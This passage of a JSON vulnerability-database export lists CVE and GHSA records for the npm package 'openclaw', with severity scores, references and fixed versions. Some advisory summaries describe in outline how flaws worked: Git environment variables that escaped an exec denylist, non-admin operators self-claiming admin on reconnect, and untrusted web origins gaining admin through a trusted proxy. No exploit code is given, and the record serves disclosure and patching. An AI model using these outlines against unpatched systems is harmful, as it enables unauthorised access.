:N/E:U"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-12T13:52:52Z/"}],"url":"https://github.com/openclaw/openclaw/commit/f61896b03cc7031f51106a04566831f4ac2a0bd7"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-57r2-h2wj-g887","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"1.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-12T13:52:52Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-57r2-h2wj-g887"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44999","reference_id":"","reference_type":"","scores":[{"value":"1.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44999"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-improper-trust-labeling-in-isolated-cron-awareness-events","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"1.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-12T13:52:52Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-improper-trust-labeling-in-isolated-cron-awareness-events"},{"reference_url":"https://github.com/advisories/GHSA-57r2-h2wj-g887","reference_id":"GHSA-57r2-h2wj-g887","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-57r2-h2wj-g887"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109923?format=json","purl":"pkg:npm/openclaw@2026.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"}],"aliases":["CVE-2026-44999","GHSA-57r2-h2wj-g887"],"risk_score":2.9,"exploitability":"0.5","weighted_severity":"5.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2c8p-gbaw-3ye4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90094?format=json","vulnerability_id":"VCID-2h6a-becf-x7ej","summary":"OpenClaw: GIT_DIR and related git plumbing env vars missing from exec env denylist (GHSA-m866-6qv5-p2fg variant)\n## Impact\n\nGIT_DIR and related git plumbing env vars missing from exec env denylist (GHSA-m866-6qv5-p2fg variant).\n\nGit plumbing environment variables were not removed before host exec and could redirect Git operations.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.3.30`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @boy-hack of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41915","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04648","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04661","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04675","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41915"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:15:09Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cm8v-2vh9-cxf3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:15:09Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-cm8v-2vh9-cxf3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41915","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41915"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-git-environment-variable-injection-via-unfiltered-exec-environment","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"2.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:15:09Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-git-environment-variable-injection-via-unfiltered-exec-environment"},{"reference_url":"https://github.com/advisories/GHSA-cm8v-2vh9-cxf3","reference_id":"GHSA-cm8v-2vh9-cxf3","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cm8v-2vh9-cxf3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109872?format=json","purl":"pkg:npm/openclaw@2026.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-wyat-1259-2kg9"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"}],"aliases":["CVE-2026-41915","GHSA-cm8v-2vh9-cxf3"],"risk_score":2.6,"exploitability":"0.5","weighted_severity":"5.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2h6a-becf-x7ej"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91183?format=json","vulnerability_id":"VCID-2hca-3v8f-f3e8","summary":"OpenClaw: Gateway Backend Reconnect lets Non-Admin Operator Scopes Self-Claim operator.admin\n## Summary\n\nGateway Backend Reconnect lets Non-Admin Operator Scopes Self-Claim operator.admin\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nBackend-labeled reconnects could previously self-request broader scopes and bypass pairing, allowing non-admin operators to reconnect as `operator.admin`. Commit `d3d8e316bd819d3c7e34253aeb7eccb2510f5f48` removes the backend self-pairing skip and requires pairing when requested scopes exceed the approved baseline.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `d3d8e316bd819d3c7e34253aeb7eccb2510f5f48`.\n\n## Fix Commit(s)\n\n- `d3d8e316bd819d3c7e34253aeb7eccb2510f5f48`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35663","reference_id":"","reference_type":"","scores":[{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.15986","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.1603","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0005","scoring_system":"epss","scoring_elements":"0.1604","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35663"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/d3d8e316bd819d3c7e34253aeb7eccb2510f5f48","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:55Z/"}],"url":"https://github.com/openclaw/openclaw/commit/d3d8e316bd819d3c7e34253aeb7eccb2510f5f48"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9hjh-fr4f-gxc4","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:55Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9hjh-fr4f-gxc4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35663","reference_id":"CVE-2026-35663","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35663"},{"reference_url":"https://github.com/advisories/GHSA-9hjh-fr4f-gxc4","reference_id":"GHSA-9hjh-fr4f-gxc4","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9hjh-fr4f-gxc4"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-backend-reconnect-scope-self-claim","reference_id":"openclaw-privilege-escalation-via-backend-reconnect-scope-self-claim","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T14:27:55Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-backend-reconnect-scope-self-claim"}],"fixed_packages":[],"aliases":["CVE-2026-35663","GHSA-9hjh-fr4f-gxc4"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2hca-3v8f-f3e8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50922?format=json","vulnerability_id":"VCID-2jsx-pvnr-6ydn","summary":"OpenClaw: Untrusted web origins can obtain authenticated operator.admin access in trusted-proxy mode\nIn affected versions of `openclaw`, browser-originated WebSocket connections could bypass origin validation when `gateway.auth.mode` was set to `trusted-proxy` and the request arrived with proxy headers. A page served from an untrusted origin could connect through a trusted reverse proxy, inherit proxy-authenticated identity, and establish a privileged operator session.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32302","reference_id":"","reference_type":"","scores":[{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06067","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06051","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.06054","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32302"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/ebed3bbde1a72a1aaa9b87b63b91e7c04a50036b","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-13T13:10:50Z/"}],"url":"https://github.com/openclaw/openclaw/commit/ebed3bbde1a72a1aaa9b87b63b91e7c04a50036b"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-13T13:10:50Z/"}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32302","reference_id":"CVE-2026-32302","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32302"},{"reference_url":"https://github.com/advisories/GHSA-5wcw-8jjv-m286","reference_id":"GHSA-5wcw-8jjv-m286","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-5wcw-8jjv-m286"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5wcw-8jjv-m286","reference_id":"GHSA-5wcw-8jjv-m286","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-13T13:10:50Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-5wcw-8jjv-m286"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74883?format=json","purl":"pkg:npm/openclaw@2026.3.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"